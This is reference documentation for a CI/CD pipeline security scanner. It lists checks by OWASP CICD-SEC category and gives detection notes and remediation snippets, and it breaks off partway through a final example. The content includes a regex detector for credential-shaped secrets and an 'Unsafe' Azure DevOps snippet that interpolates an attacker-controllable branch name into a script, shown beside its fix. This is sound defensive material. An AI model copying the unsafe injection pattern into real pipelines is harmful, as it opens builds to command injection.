TKN-015 Workspace subPath interpolates a Task parameter (path traversal) HIGH Tekton

CICD-SEC-6: Insufficient Credential Hygiene

Plaintext secrets in YAML, env vars baked into image layers, or tokens echoed to logs all leak credentials before they're ever exploited; rotation only helps if the leak is detected.
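"Credential-shaped literal" checks (GHA-008, DF-006, and peers) are pattern matches against well-known token formats. A minimal sketch carrying just two shapes, AWS access key IDs and GitHub classic PATs; a real detector carries many more:

```python
import re

# Illustrative sketch of a credential-shaped-literal detector. The two
# patterns here are a tiny sample of what such a check would carry.
CREDENTIAL_SHAPES = [
    re.compile(r"\bAKIA[0-9A-Z]{16}\b"),     # AWS access key ID
    re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),  # GitHub classic PAT
]

def looks_like_credential(value: str) -> bool:
    return any(p.search(value) for p in CREDENTIAL_SHAPES)

print(looks_like_credential("AKIA" + "A" * 16))      # True
print(looks_like_credential("build-2024-artifact"))  # False
```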

Evidenced by 57 checks across 17 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, CloudFormation, Dockerfile, Drone CI, GitHub Actions, GitLab CI, Jenkins, Kubernetes, SCM, Tekton, Terraform).

Check Title Severity Provider Fix
ADO-003 Variables contain literal secret values CRITICAL Azure DevOps
ADO-008 Credential-shaped literal in pipeline body CRITICAL Azure DevOps 🔧 fix
ADO-014 AWS auth uses long-lived access keys MEDIUM Azure DevOps 🔧 fix
ARGO-006 Literal secret value in Argo template env or parameter default CRITICAL Argo Workflows 🔧 fix
BB-003 Variables contain literal secret values CRITICAL Bitbucket
BB-008 Credential-shaped literal in pipeline body CRITICAL Bitbucket 🔧 fix
BB-011 AWS auth uses long-lived access keys MEDIUM Bitbucket 🔧 fix
BB-017 Repository token written to persistent storage CRITICAL Bitbucket 🔧 fix
BB-019 after-script references secrets HIGH Bitbucket
BK-002 Literal secret value in pipeline env block CRITICAL Buildkite 🔧 fix
CB-001 Secrets in plaintext environment variables CRITICAL AWS
CB-006 CodeBuild source auth uses long-lived token HIGH AWS
CC-004 Secret-like environment variable not managed via context MEDIUM CircleCI
CC-005 AWS auth uses long-lived access keys in environment block MEDIUM CircleCI 🔧 fix
CC-008 Credential-shaped literal in config body CRITICAL CircleCI 🔧 fix
CC-019 add_ssh_keys without fingerprint restriction HIGH CircleCI
CC-030 Workflow job uses context without branch filter or approval gate MEDIUM CircleCI
CF-001 Inline credential parameter on a CloudFormation resource HIGH CloudFormation
CF-002 CloudFormation parameter declares a default secret value HIGH CloudFormation
CP-004 Legacy ThirdParty/GitHub source action (OAuth token) HIGH AWS
DF-006 ENV or ARG carries a credential-shaped literal value CRITICAL Dockerfile
DF-019 COPY/ADD source path looks like a credential file HIGH Dockerfile 🔧 fix
DF-020 ARG declares a credential-named build argument HIGH Dockerfile 🔧 fix
DR-004 Literal credential in step environment / settings CRITICAL Drone CI
GCB-003 Secret Manager value referenced in step args HIGH Cloud Build
GCB-007 availableSecrets references versions/latest MEDIUM Cloud Build 🔧 fix
GCB-012 Credential-shaped literal in pipeline body CRITICAL Cloud Build
GCB-018 Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) MEDIUM Cloud Build
GHA-005 AWS auth uses long-lived access keys MEDIUM GitHub Actions 🔧 fix
GHA-008 Credential-shaped literal in workflow body CRITICAL GitHub Actions 🔧 fix
GHA-019 GITHUB_TOKEN written to persistent storage CRITICAL GitHub Actions 🔧 fix
GHA-033 Secret value echoed / printed in a run: block CRITICAL GitHub Actions
GHA-034 Reusable workflow called with secrets: inherit MEDIUM GitHub Actions 🔧 fix
GHA-037 actions/checkout persists GITHUB_TOKEN into .git/config HIGH GitHub Actions
GHA-039 services / container credentials embedded as literal in workflow CRITICAL GitHub Actions
GL-003 Variables contain literal secret values CRITICAL GitLab CI
GL-008 Credential-shaped literal in pipeline body CRITICAL GitLab CI 🔧 fix
GL-013 AWS auth uses long-lived access keys MEDIUM GitLab CI 🔧 fix
GL-020 CI_JOB_TOKEN written to persistent storage CRITICAL GitLab CI 🔧 fix
IAM-007 IAM user has access key older than 90 days HIGH AWS
JF-004 AWS auth uses long-lived access keys via withCredentials MEDIUM Jenkins 🔧 fix
JF-008 Credential-shaped literal in pipeline body CRITICAL Jenkins 🔧 fix
JF-010 Long-lived AWS keys exposed via environment {} block HIGH Jenkins 🔧 fix
K8S-012 Pod automountServiceAccountToken not false MEDIUM Kubernetes
K8S-017 Container env value carries a credential-shaped literal CRITICAL Kubernetes
K8S-018 Secret stringData/data carries a credential-shaped literal CRITICAL Kubernetes
K8S-037 ConfigMap data carries a credential-shaped literal HIGH Kubernetes
KMS-001 KMS customer-managed key has rotation disabled MEDIUM AWS
LMB-003 Lambda function env vars may contain plaintext secrets HIGH AWS
SCM-004 GitHub secret scanning is not enabled HIGH SCM
SCM-006 Default branch protection does not require signed commits MEDIUM SCM
SCM-015 Secret scanning push protection is not enabled HIGH SCM
SM-001 Secrets Manager secret has no rotation configured HIGH AWS
SSM-001 SSM Parameter with secret-like name is not a SecureString HIGH AWS
TF-001 aws_iam_access_key declares a long-lived access key CRITICAL Terraform
TF-002 Resource attribute carries a hard-coded secret shape CRITICAL Terraform
TKN-005 Literal secret value in Tekton step env or param default CRITICAL Tekton 🔧 fix

CICD-SEC-7: Insecure System Configuration

Privileged containers, host mounts, root user, and disabled TLS turn a routine RCE in a build step into kernel-level access to the runner host.

Evidenced by 87 checks across 16 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, CloudFormation, Dockerfile, Drone CI, GitHub Actions, GitLab CI, Jenkins, Kubernetes, Tekton, Terraform).

Check Title Severity Provider Fix
ADO-013 Self-hosted pool without explicit ephemeral marker MEDIUM Azure DevOps
ADO-015 Job has no timeoutInMinutes, unbounded build MEDIUM Azure DevOps 🔧 fix
ADO-017 Docker run with insecure flags (privileged/host mount) CRITICAL Azure DevOps 🔧 fix
ADO-026 Pipeline contains indicators of malicious activity CRITICAL Azure DevOps
ADO-030 pool interpolates attacker-controllable value HIGH Azure DevOps 🔧 fix
ARGO-006 Literal secret value in Argo template env or parameter default CRITICAL Argo Workflows 🔧 fix
ARGO-013 Argo workflow does not opt out of SA token automount MEDIUM Argo Workflows
BB-005 Step has no max-time, unbounded build MEDIUM Bitbucket 🔧 fix
BB-013 Docker run with insecure flags (privileged/host mount) CRITICAL Bitbucket 🔧 fix
BB-016 Self-hosted runner without ephemeral marker MEDIUM Bitbucket
BB-020 Full clone depth exposes complete history LOW Bitbucket
BB-025 Pipeline contains indicators of malicious activity CRITICAL Bitbucket
BK-002 Literal secret value in pipeline env block CRITICAL Buildkite 🔧 fix
BK-007 Deploy step not gated by a manual block / input MEDIUM Buildkite
BK-015 agents map interpolates attacker-controllable Buildkite variable HIGH Buildkite
CB-002 Privileged mode enabled HIGH AWS
CB-004 No build timeout configured LOW AWS
CB-005 Outdated managed build image MEDIUM AWS
CB-011 CodeBuild buildspec contains indicators of malicious activity CRITICAL AWS
CC-010 Self-hosted runner without ephemeral marker MEDIUM CircleCI
CC-015 No no_output_timeout configured MEDIUM CircleCI 🔧 fix
CC-017 Docker run with insecure flags (privileged/host mount) CRITICAL CircleCI 🔧 fix
CC-026 Config contains indicators of malicious activity CRITICAL CircleCI
CF-003 CloudFormation resource opens a 0.0.0.0/0 ingress HIGH CloudFormation
DF-002 Container runs as root (missing or root USER directive) HIGH Dockerfile 🔧 fix
DF-008 RUN invokes docker --privileged or escalates capabilities HIGH Dockerfile
DF-011 Package manager install without cache cleanup in same layer LOW Dockerfile
DF-012 RUN invokes sudo HIGH Dockerfile
DF-013 EXPOSE declares sensitive remote-access port CRITICAL Dockerfile 🔧 fix
DF-014 WORKDIR set to a system / kernel filesystem path CRITICAL Dockerfile
DF-015 RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM Dockerfile
DF-017 ENV PATH prepends a world-writable directory MEDIUM Dockerfile 🔧 fix
DF-018 RUN chown rewrites ownership of a system path MEDIUM Dockerfile
DR-004 Literal credential in step environment / settings CRITICAL Drone CI
DR-011 node map interpolates attacker-controllable Drone variable HIGH Drone CI
ECR-004 No lifecycle policy configured LOW AWS
GCB-005 Build timeout unset or excessive LOW Cloud Build 🔧 fix
GCB-016 Step dir field contains parent-directory escape (..) MEDIUM Cloud Build
GCB-021 No private worker pool, build runs on the shared default pool MEDIUM Cloud Build 🔧 fix
GHA-012 Self-hosted runner without ephemeral marker MEDIUM GitHub Actions
GHA-015 Job has no timeout-minutes, unbounded build MEDIUM GitHub Actions 🔧 fix
GHA-017 Docker run with insecure flags (privileged/host mount) CRITICAL GitHub Actions 🔧 fix
GHA-026 Container job disables isolation via options: HIGH GitHub Actions
GHA-027 Workflow contains indicators of malicious activity CRITICAL GitHub Actions
GHA-036 runs-on interpolates untrusted context HIGH GitHub Actions 🔧 fix
GHA-038 Workflow re-enables retired ::set-env / ::add-path commands CRITICAL GitHub Actions
GL-014 Self-managed runner without ephemeral tag MEDIUM GitLab CI
GL-015 Job has no timeout, unbounded build MEDIUM GitLab CI 🔧 fix
GL-017 Docker run with insecure flags (privileged/host mount) CRITICAL GitLab CI 🔧 fix
GL-025 Pipeline contains indicators of malicious activity CRITICAL GitLab CI
GL-032 tags: interpolates untrusted CI variable HIGH GitLab CI 🔧 fix
JF-014 Agent label missing ephemeral marker MEDIUM Jenkins
JF-015 Pipeline has no timeout wrapper, unbounded build MEDIUM Jenkins 🔧 fix
JF-017 Docker run with insecure flags (privileged/host mount) CRITICAL Jenkins 🔧 fix
JF-025 Kubernetes agent pod template runs privileged or mounts hostPath HIGH Jenkins
JF-029 Jenkinsfile contains indicators of malicious activity CRITICAL Jenkins
JF-032 Agent label interpolates attacker-controllable value HIGH Jenkins 🔧 fix
K8S-002 Pod hostNetwork: true HIGH Kubernetes 🔧 fix
K8S-003 Pod hostPID: true HIGH Kubernetes 🔧 fix
K8S-004 Pod hostIPC: true HIGH Kubernetes 🔧 fix
K8S-005 Container securityContext.privileged: true CRITICAL Kubernetes 🔧 fix
K8S-006 Container allowPrivilegeEscalation not explicitly false HIGH Kubernetes 🔧 fix
K8S-007 Container runAsNonRoot not true / runAsUser is 0 HIGH Kubernetes 🔧 fix
K8S-008 Container readOnlyRootFilesystem not true MEDIUM Kubernetes 🔧 fix
K8S-009 Container capabilities not dropping ALL / adding dangerous caps HIGH Kubernetes
K8S-010 Container seccompProfile not RuntimeDefault or Localhost MEDIUM Kubernetes
K8S-013 Pod uses a hostPath volume HIGH Kubernetes 🔧 fix
K8S-014 Pod hostPath references a sensitive host directory CRITICAL Kubernetes
K8S-015 Container missing resources.limits.memory MEDIUM Kubernetes
K8S-016 Container missing resources.limits.cpu LOW Kubernetes
K8S-022 Service exposes SSH (port 22) MEDIUM Kubernetes
K8S-023 Namespace missing Pod Security Admission enforcement label HIGH Kubernetes
K8S-024 Container missing both livenessProbe and readinessProbe MEDIUM Kubernetes
K8S-025 System priority class used outside kube-system HIGH Kubernetes
K8S-026 LoadBalancer Service has no loadBalancerSourceRanges HIGH Kubernetes
K8S-027 Ingress has no TLS configuration MEDIUM Kubernetes
K8S-028 Container declares hostPort MEDIUM Kubernetes 🔧 fix
K8S-030 Workload schedules onto a control-plane node HIGH Kubernetes 🔧 fix
K8S-031 Namespace missing PSA warn label LOW Kubernetes
K8S-032 Namespace lacks default-deny NetworkPolicy MEDIUM Kubernetes
K8S-033 Namespace lacks ResourceQuota or LimitRange MEDIUM Kubernetes
K8S-035 Container securityContext.runAsUser is 0 HIGH Kubernetes
K8S-038 NetworkPolicy ingress / egress allows all sources or destinations MEDIUM Kubernetes
K8S-039 Pod uses shareProcessNamespace: true MEDIUM Kubernetes
K8S-040 Container securityContext.procMount: Unmasked HIGH Kubernetes
TF-003 CodeBuild VPC shares its VPC with a public subnet HIGH Terraform
TKN-005 Literal secret value in Tekton step env or param default CRITICAL Tekton 🔧 fix

CICD-SEC-8: Ungoverned Usage of 3rd-Party Services

Calls to external services (SaaS integrations, marketplace actions, package registries) expand the trust perimeter of the pipeline beyond what was reviewed and approved.

Evidenced by 8 checks across 2 providers (AWS, GitHub Actions).

Check Title Severity Provider Fix
CA-003 CodeArtifact domain policy allows cross-account wildcard CRITICAL AWS
CCM-003 CodeCommit trigger targets SNS/Lambda in a different account MEDIUM AWS
EB-002 EventBridge rule has a wildcard target ARN HIGH AWS
ECR-003 Repository policy allows public access CRITICAL AWS
GHA-047 Action ref resolves to a recently committed tag or SHA MEDIUM GitHub Actions
LMB-002 Lambda function URL has AuthType=NONE HIGH AWS
LMB-004 Lambda resource policy allows wildcard principal CRITICAL AWS
SM-002 Secrets Manager resource policy allows wildcard principal CRITICAL AWS

CICD-SEC-9: Improper Artifact Integrity Validation

Without provenance, attestations, signatures, or SBOMs, downstream consumers (including production deploy targets) cannot verify that the artifact they run is the one the pipeline built.

Evidenced by 62 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Jenkins, OCI manifest, Tekton).

Check Title Severity Provider Fix
ADO-006 Artifacts not signed MEDIUM Azure DevOps
ADO-007 SBOM not produced MEDIUM Azure DevOps
ADO-024 No SLSA provenance attestation produced MEDIUM Azure DevOps
ARGO-007 Argo workflow has no activeDeadlineSeconds LOW Argo Workflows
ARGO-009 Artifacts not signed (no cosign/sigstore step) MEDIUM Argo Workflows
ARGO-010 No SBOM generated for build artifacts MEDIUM Argo Workflows
ARGO-011 No SLSA provenance attestation produced MEDIUM Argo Workflows
ARGO-012 No vulnerability scanning step MEDIUM Argo Workflows
ARGO-015 Input artifact pulls from an insecure (non-HTTPS) URL HIGH Argo Workflows
ATTEST-001 SLSA provenance attests an untrusted builder identity HIGH OCI manifest
ATTEST-002 SLSA provenance source-repo claim is missing or unverifiable HIGH OCI manifest
ATTEST-003 SBOM contains floating-version dependencies MEDIUM OCI manifest
BB-006 Artifacts not signed MEDIUM Bitbucket
BB-007 SBOM not produced MEDIUM Bitbucket
BB-024 No SLSA provenance attestation produced MEDIUM Bitbucket
BK-006 Step has no timeout_in_minutes LOW Buildkite
BK-009 Artifacts not signed (no cosign/sigstore step) MEDIUM Buildkite
BK-010 No SBOM generated for build artifacts MEDIUM Buildkite
BK-011 No SLSA provenance attestation produced MEDIUM Buildkite
BK-012 No vulnerability scanning step MEDIUM Buildkite
CA-001 CodeArtifact domain not encrypted with customer KMS CMK MEDIUM AWS
CC-006 Artifacts not signed (no cosign/sigstore step) MEDIUM CircleCI
CC-007 SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM CircleCI
CC-024 No SLSA provenance attestation produced MEDIUM CircleCI
CCM-002 CodeCommit repository not encrypted with customer KMS CMK MEDIUM AWS
CP-002 Artifact store not encrypted with customer-managed KMS key MEDIUM AWS
CWL-002 CodeBuild log group not KMS-encrypted MEDIUM AWS
DF-003 ADD pulls remote URL without integrity verification HIGH Dockerfile
DF-016 Image lacks OCI provenance labels LOW Dockerfile
ECR-002 Image tags are mutable HIGH AWS
ECR-005 Repository encrypted with AES256 rather than KMS CMK MEDIUM AWS
GCB-009 Artifacts not signed (no cosign / sigstore step) MEDIUM Cloud Build
GCB-015 SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) MEDIUM Cloud Build
GCB-017 Image-producing build does not request SLSA provenance MEDIUM Cloud Build
GCB-024 Build pushes Docker images but top-level images: is empty LOW Cloud Build
GHA-006 Artifacts not signed (no cosign/sigstore step) MEDIUM GitHub Actions
GHA-007 SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM GitHub Actions
GHA-024 No SLSA provenance attestation produced MEDIUM GitHub Actions
GL-006 Artifacts not signed MEDIUM GitLab CI
GL-007 SBOM not produced MEDIUM GitLab CI
GL-024 No SLSA provenance attestation produced MEDIUM GitLab CI
JF-006 Artifacts not signed MEDIUM Jenkins
JF-007 SBOM not produced MEDIUM Jenkins
JF-027 archiveArtifacts does not record a fingerprint LOW Jenkins
JF-028 No SLSA provenance attestation produced MEDIUM Jenkins
LMB-001 Lambda function has no code-signing config HIGH AWS
OCI-002 Image is missing a build attestation manifest HIGH OCI manifest
OCI-004 Image layer references an arbitrary URL (foreign layer) HIGH OCI manifest
OCI-007 Image manifest uses legacy schemaVersion 1 (no content addressing) HIGH OCI manifest
OCI-008 Manifest references digest using unsupported hash algorithm HIGH OCI manifest
S3-001 Artifact bucket public access block not fully enabled CRITICAL AWS
S3-002 Artifact bucket server-side encryption not configured HIGH AWS
S3-003 Artifact bucket versioning not enabled MEDIUM AWS
S3-005 Artifact bucket missing aws:SecureTransport deny MEDIUM AWS
SIGN-001 No AWS Signer profile defined for Lambda deploys MEDIUM AWS
SIGN-002 AWS Signer profile is revoked or inactive HIGH AWS
SSM-002 SSM SecureString uses the default AWS-managed key MEDIUM AWS
TKN-006 Tekton run lacks an explicit timeout LOW Tekton
TKN-009 Artifacts not signed (no cosign/sigstore step) MEDIUM Tekton
TKN-010 No SBOM generated for build artifacts MEDIUM Tekton
TKN-011 No SLSA provenance attestation produced MEDIUM Tekton
TKN-012 No vulnerability scanning step MEDIUM Tekton

CICD-SEC-10: Insufficient Logging and Visibility

When the pipeline doesn't log its decisions, audits stall and incident response lacks the timeline needed to scope a compromise.

Evidenced by 42 checks across 8 providers (AWS, CircleCI, Cloud Build, Dockerfile, Jenkins, Kubernetes, OCI manifest, SCM).

Check Title Severity Provider Fix
ATTEST-003 SBOM contains floating-version dependencies MEDIUM OCI manifest
CA-000 CodeArtifact API access failed INFO AWS
CB-000 CodeBuild API access failed INFO AWS
CB-003 Build logging not enabled MEDIUM AWS
CC-011 No store_test_results step (test results not archived) LOW CircleCI
CCM-000 CodeCommit API access failed INFO AWS
CD-000 CodeDeploy API access failed INFO AWS
CD-003 No CloudWatch alarm monitoring on deployment group MEDIUM AWS
CP-000 CodePipeline API access failed INFO AWS
CT-000 CloudTrail API access failed INFO AWS
CT-001 No active CloudTrail trail in region HIGH AWS
CT-002 CloudTrail log-file validation disabled MEDIUM AWS
CT-003 CloudTrail trail is not multi-region MEDIUM AWS
CW-001 No CloudWatch alarm on CodeBuild FailedBuilds metric LOW AWS
CWL-000 CloudWatch Logs API access failed INFO AWS
CWL-001 CodeBuild log group has no retention policy LOW AWS
DF-007 No HEALTHCHECK directive declared LOW Dockerfile 🔧 fix
DF-016 Image lacks OCI provenance labels LOW Dockerfile
EB-000 EventBridge API access failed INFO AWS
EB-001 No EventBridge rule for CodePipeline failure notifications MEDIUM AWS
ECR-000 ECR API access failed INFO AWS
GCB-014 Build logging disabled (options.logging: NONE) HIGH Cloud Build 🔧 fix
GCB-017 Image-producing build does not request SLSA provenance MEDIUM Cloud Build
GCB-025 Build has no tags for audit / discoverability LOW Cloud Build
IAM-000 IAM API access failed INFO AWS
JF-011 Pipeline has no buildDiscarder retention policy LOW Jenkins 🔧 fix
K8S-024 Container missing both livenessProbe and readinessProbe MEDIUM Kubernetes
KMS-000 KMS API access failed INFO AWS
LMB-000 Lambda API access failed INFO AWS
OCI-001 Image manifest is missing OCI provenance annotations MEDIUM OCI manifest
OCI-002 Image is missing a build attestation manifest HIGH OCI manifest
OCI-003 Image manifest is missing the image.created annotation LOW OCI manifest
OCI-005 Image manifest is missing the image.licenses annotation LOW OCI manifest
PBAC-000 PBAC enumeration failed INFO AWS
S3-000 S3 API access failed INFO AWS
S3-004 Artifact bucket access logging not enabled LOW AWS
SCM-003 GitHub default code scanning is not enabled MEDIUM SCM
SCM-005 Dependabot security updates are not enabled MEDIUM SCM
SCM-008 Default branch protection does not require status checks MEDIUM SCM
SCM-016 Private vulnerability reporting is not enabled LOW SCM
SM-000 Secrets Manager API access failed INFO AWS
SSM-000 SSM Parameter Store API access failed INFO AWS

Check details

Every check that evidences this standard, rendered once with its detection mechanism, recommendation, and any known false-positive modes or real-world incident references. The per-control tables above link to the matching block here.

ADO-001: Task reference not pinned to specific version HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Floating-major task references (@1, @2) can roll forward silently when the task publisher ships a breaking or malicious update. The check passes when every task: reference carries a two- or three-segment semver.

Recommendation. Reference tasks by a full semver (DownloadSecureFile@1.2.3) or extension-published-version. Track task updates explicitly via Azure DevOps extension settings rather than letting @1 drift.
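
A pinned reference might look like the following sketch (the task input and file name are illustrative):

```yaml
steps:
  # Full semver pin: the task cannot roll forward silently
  - task: DownloadSecureFile@1.2.3
    inputs:
      secureFile: signing-cert.pfx   # hypothetical secure file
```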

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-001 in the Azure DevOps provider.

ADO-002: Script injection via attacker-controllable context HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. $(Build.SourceBranch*), $(Build.SourceVersionMessage), and $(System.PullRequest.*) are populated from SCM event metadata the attacker controls. Inline interpolation into a script body executes crafted content.

Recommendation. Pass these values through an intermediate pipeline variable declared with readonly: true, and reference that variable through an environment variable rather than $(...) macro interpolation. ADO expands $(…) before shell quoting, so inline use is never safe.
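
A minimal before/after sketch of the pattern:

```yaml
# Unsafe: $(...) is macro-expanded into the script body before the
# shell runs, so a crafted branch name becomes shell syntax
- script: echo "Building $(Build.SourceBranchName)"

# Safer: pass the value through an environment variable; the shell
# receives it as data, not code
- script: echo "Building $BRANCH"
  env:
    BRANCH: $(Build.SourceBranchName)
```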

Source: ADO-002 in the Azure DevOps provider.

ADO-003: Variables contain literal secret values CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Scans variables: in both the mapping form ({KEY: VAL}) and the list form ([{name: X, value: Y}]) that ADO supports. AWS keys are detected by value shape regardless of variable name.

Recommendation. Store secrets in an Azure Key Vault or a Library variable group with the secret flag set; reference them via $(SECRET_NAME) at runtime. For cloud access prefer Azure workload identity federation.
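
A sketch of the runtime-reference pattern (the group and variable names are hypothetical):

```yaml
variables:
  # Secret values live in a Library variable group (or a linked
  # Key Vault), never in the YAML itself
  - group: prod-secrets

steps:
  - script: ./deploy.sh
    env:
      API_TOKEN: $(API_TOKEN)   # resolved from the group at runtime
```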

Source: ADO-003 in the Azure DevOps provider.

ADO-004: Deployment job missing environment binding MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without an environment: binding, ADO cannot enforce approvals, checks, or deployment history against a named resource. Every deployment: job should bind one.

Recommendation. Add environment: <name> to every deployment: job. Configure approvals, required branches, and business-hours checks on the matching Environment in the ADO UI.
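
A minimal deployment job with the binding in place (names are illustrative):

```yaml
jobs:
  - deployment: deploy_web
    environment: production   # approvals and checks attach to this Environment
    strategy:
      runOnce:
        deploy:
          steps:
            - script: ./deploy.sh
```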

Source: ADO-004 in the Azure DevOps provider.

ADO-005: Container image not pinned to specific version HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Container images can be declared at resources.containers[].image or job.container (string or {image:}). Floating / untagged refs let the publisher swap the image contents.

Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag. Avoid :latest and untagged refs.
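
A digest-pinned container resource might look like this sketch (image name and digest are placeholders):

```yaml
resources:
  containers:
    - container: build
      # Digest pin: the publisher cannot swap the content behind this ref
      image: node@sha256:<digest>
```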

Source: ADO-005 in the Azure DevOps provider.

ADO-006: Artifacts not signed MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The check passes when cosign / sigstore / slsa-* / notation-sign appears anywhere in the pipeline text.

Recommendation. Add a task that runs cosign sign or notation sign; Azure Pipelines' workload identity federation enables keyless signing. Publish the signature to the artifact feed and verify it at deploy time.
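
One possible shape for the signing step, assuming cosign is installed on the agent and the pipeline's federated identity supports keyless signing (the $(imageRef) variable is hypothetical):

```yaml
- task: Bash@3
  inputs:
    targetType: inline
    script: |
      # Keyless sign via the ambient OIDC identity; --yes skips the prompt
      cosign sign --yes "$(imageRef)"
```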

Source: ADO-006 in the Azure DevOps provider.

ADO-007: SBOM not produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The check looks for an SBOM-generation step in the pipeline text. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact.

Recommendation. Add an SBOM step such as microsoft/sbom-tool, syft . -o cyclonedx-json, or anchore/sbom-action. Publish the SBOM as a pipeline artifact so downstream consumers can ingest it.

Source: ADO-007 in the Azure DevOps provider.

ADO-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements ADO-003 (which looks at variables: keys). ADO-008 scans every string in the pipeline against the cross-provider credential-pattern catalog.

Recommendation. Rotate the exposed credential. Move the value to Azure Key Vault or a secret variable group and reference it via $(SECRET_NAME).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed: if it appears in a real pipeline, it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: ADO-008 in the Azure DevOps provider.

ADO-009: Container image pinned by tag rather than sha256 digest LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. ADO-005 fails floating tags at HIGH; ADO-009 is the stricter tier. Even immutable-looking version tags can be repointed by registry operators.

Recommendation. Resolve each image to its current digest and replace the tag with @sha256:<digest>. Schedule regular digest bumps via Renovate or a scheduled pipeline.

Source: ADO-009 in the Azure DevOps provider.

ADO-010: Cross-pipeline download: ingestion unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. resources.pipelines: declares an upstream pipeline; a download: <name> step pulls its artifacts. If the upstream accepts PR validation, the artifact may have been built by PR-controlled code.

Recommendation. Add a verification step before consuming the artifact: cosign verify-attestation, sha256sum -c, or gpg --verify against a manifest the producing pipeline signed.
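
A checksum-verification sketch, assuming the upstream pipeline publishes a SHA256SUMS manifest alongside its artifact (the resource and artifact names are hypothetical):

```yaml
steps:
  - download: upstream      # pipeline resource declared under resources.pipelines
  - script: |
      cd "$(Pipeline.Workspace)/upstream/drop"
      # Fail the job if any file differs from the published manifest
      sha256sum -c SHA256SUMS
```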

Source: ADO-010 in the Azure DevOps provider.

ADO-011: template: <local-path> on PR-validated pipeline HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. template: <relative-path> includes another YAML from the current repo. On PR validation builds, the repo content is the PR branch, letting the PR author swap the template body. Cross-repo templates (template: foo.yml@my-repo) are version-pinned and not affected.

Recommendation. Move the template into a separate, branch-protected repository and reference it via template: foo.yml@<repo-resource> with a pinned ref: on the resource. That way the template content is fixed at PR creation time and can't be modified from the PR branch.
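
A pinned cross-repo template reference might look like this (repository and tag names are illustrative):

```yaml
resources:
  repositories:
    - repository: templates
      type: git
      name: MyProject/pipeline-templates
      ref: refs/tags/v1.4.0   # pinned; the PR branch cannot change it

steps:
  - template: build-steps.yml@templates
```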

Source: ADO-011 in the Azure DevOps provider.

ADO-012: Cache@2 key derives from $(System.PullRequest.*) MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Cache@2 (and older CacheBeta@1) restore by key. A key including PR-controlled variables on PR-validated pipelines lets a PR seed a poisoned cache entry that a later default-branch pipeline restores.

Recommendation. Build the cache key from values the PR can't control: $(Agent.OS), lockfile hashes, the pipeline name. Never reference $(System.PullRequest.*) or $(Build.SourceBranch*) from a cache key namespace.
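
A cache key built only from PR-independent inputs, sketched for an npm cache (following the common Cache@2 idiom):

```yaml
- task: Cache@2
  inputs:
    # OS + lockfile: nothing here is attacker-controllable from a PR
    key: 'npm | "$(Agent.OS)" | package-lock.json'
    path: $(npm_config_cache)
```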

Source: ADO-012 in the Azure DevOps provider.

ADO-013: Self-hosted pool without explicit ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. pool: { name: <agent-pool> } (or the bare string form pool: <name>) targets a self-hosted agent pool. Without an explicit ephemeral arrangement, agents reuse state across jobs. Microsoft-hosted pools (vmImage: or the Azure Pipelines / Default names) are skipped.

Recommendation. Configure the agent pool with autoscaling + ephemeral agents (the Azure VM Scale Set agent), and add demands: [ephemeral -equals true] on the pool block so this check can verify it.

Source: ADO-013 in the Azure DevOps provider.

ADO-014: AWS auth uses long-lived access keys MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values in pipeline variables or task inputs can't be rotated on a fine-grained schedule. Prefer OIDC or vault-based credential injection for cross-cloud access.

Recommendation. Use workload identity federation or an Azure Key Vault task to inject short-lived AWS credentials at runtime. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from pipeline variables and task parameters.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-014 in the Azure DevOps provider.

ADO-015: Job has no timeoutInMinutes, unbounded build MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without timeoutInMinutes, the job runs until Azure's 60-minute default kills it. Explicit timeouts cap blast radius and the window during which a compromised step has access to service connections.

Recommendation. Add timeoutInMinutes: to each job, sized to the 95th percentile of historical runtime plus margin. Azure's default is 60 minutes; an explicitly shorter value limits blast radius and agent cost.
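
For illustration (the timeout value is a placeholder; size it per job):

```yaml
jobs:
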